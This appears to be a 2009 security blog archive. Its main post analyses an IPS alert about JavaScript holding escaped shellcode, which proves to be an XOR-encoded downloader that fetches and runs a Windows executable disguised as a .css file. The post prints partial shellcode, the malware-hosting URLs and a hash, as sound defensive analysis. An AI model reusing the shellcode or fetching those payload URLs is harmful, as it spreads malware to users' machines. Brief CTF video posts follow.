Archive for November, 2009

27
Nov
09

shellcode does what?!

I had an IPS event pop up that I got to review.

File is a static javascript variable ( bit of an oxymoron I know 😛 )  that had shellcode defined.

Ran the URL into my local jsunpack and had a look at what it was able to find.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u “bbs. xcdx169. net /images /img /k /lll.jpg”
URL fetch bbs. xcdx169. net /images /img /k /lll.jpg
(referer=www.google.com/trends/hottrends)
saved 4420 bytes to ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

Processing ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a
[nothing detected] bbs. xcdx169. net /images /img /k /lll.jpg
info: [decodingLevel=0] found JavaScript
info: saved original parsed JavaScript to ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

[file] created ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg
[file] created ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg

matt@malicious:~/research/jsunpack-n$ cat ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

var YT00=”\xu10EB\xu4B5B\xuC933\xuFBB1\xu04B5\xu3480\xuF40B\xuFAE2\xu05EB\xuEBE8\xuFFFF\xu1DFF\xuF0AE\xuF4F4\xu90AB\xuC455″;
var YT01=”\xuF4F4\xu7FF4\xuF8B4\xu847F\xu59E8\xu9C7F\xu7FFC\xu9E03\xuADFB\xu0E1C\xuF4F7\xu16F4\xu9E0D\xu9C98\xu809A\xu9890″;

…..   Cut for Blog ( download link above if you want to look at the full thing. )

var YT23=”\xuD0AA\xu29F7\xu7F92\xuBFF8\xuAA7F\xuF7E8\xu7F29\xu7FF0\xu31F7\xuAA5F\xu37AD\xu551C\xu0B0F\xu7A0B\xuFABA\xu5E18″;
var YT24=”\xuF908\xu7C88\xuB90E\xu512F\xuF4E3\xuE288\xu0E91\xuEBE4\xuFE8D\xu0F1C\xu0963\xuD1FB\xu0B44\xu1036\xuBE30\xuEF1B”;
var YT25=”\xuB232\xu8A8D\xu162C\xu3487\xu1663\xu291B\xu4968\xu6886\xuEE61\xu559A\xuC99E\xu162C\xu953E\xuA312\xu4154\xuC24F”;
var YT26=”\xuDBEE\xuE684\xu3FF6\xu6EE1\xu8ADF\xu11AF\xuDCE8\xuBE3B\xu0FFC\xu5141\xu9CEE\xu281F\xu9A3E”;
var YT27=”\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4″;

matt@malicious:~/research/jsunpack-n$

( I’ve edited the shellcode from % to \x so if you download the above file and see it is different don’t be thinking I’m making stuff up 😛 )

Since I’ve not seen what has delivered this to the user, I’m left with loading it somehow to review it.

I dump the shellcode into http://sandsprite.com/shellcode_2_exe.php which will give you a .exe file with the shellcode attached. So you can load it up in Ollydbg and have a quick look.

As you can see there is the original stub that loads WSAStartup to load any references to winsock calls.  In this I’ve also hilighted within the small piece of code attached from the shellcode that its another stub but for an XOR encryption. As you can see, the XOR key is right there, 0xF4. There are 2 ways to go from here. We could step through the code to let it decrypt itself or since we know the key for the XOR we can just copy&paste the rest of the shellcode into WinHex and just manually let it decode the whole block.

We click OK and the code should dump out like this.

And at the end of the block we can see another URL that will be downloaded by the shellcode and executed.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u “http://bbs. xcdx169. net /images /img /hx.css”
URL fetch bbs. xcdx169. net /images /img /hx.css
(referer=www.google.com/trends/hottrends)
saved 25088 bytes to ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

Processing ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
[nothing detected] [MZ] bbs. xcdx169. net /images /img /hx.css
info: [0] executable file

[file] created ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef from bbs. xcdx169. net /images /img /hx.css

matt@malicious:~/research/jsunpack-n$ file ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
matt@malicious:~/research/jsunpack-n$ md5sum ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
883e3c54c21fda4efae0fc85ff96724c  ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

We have a .exe file loaded from the site which hosted it as a .css. This .exe has reasonable coverage from VirusTotal.

http://www.virustotal.com/analisis/ba998b7df2fa3dd3816e8bb57798ff35d6a942be2f8cddde6647b8067ca42d30-1259022619

Advertisements
21
Nov
09

CSAW CTF video #2

This is the video for binaries 2.exe, 3.exe and 4.exe.  These aren’t intended to be major indepth tutorials, only a demonstration of how I retrieved the flag from each binary. I’m not the greatest at reversing or making videos.  I just like to share whatever I can. :]

 

Thanks for your positive comments so far 😀

19
Nov
09

CSAW CTF video #1

After the Capture the Flag event of CSAW, Stephen Ridley released the source and binaries for the challenges on his github at http://github.com/s7ephen/CSAW_2009 . I spent a couple hours and did the challenges and found them to be fun while still quite simple at times. Later challenges are a real challenge for me as they require some coding to load libraries and I’ve not coded anything properly in years. 😀

Here is the first binary solution.  I may remake this video at a lower resolution so it will be easier to read.

06
Nov
09

Intention

Moved this to the About page :]

http://www.twitter.com/lordparody  I’ll update any new posts via twitter.

06
Nov
09

My Spoon is too big!

I am a Banana!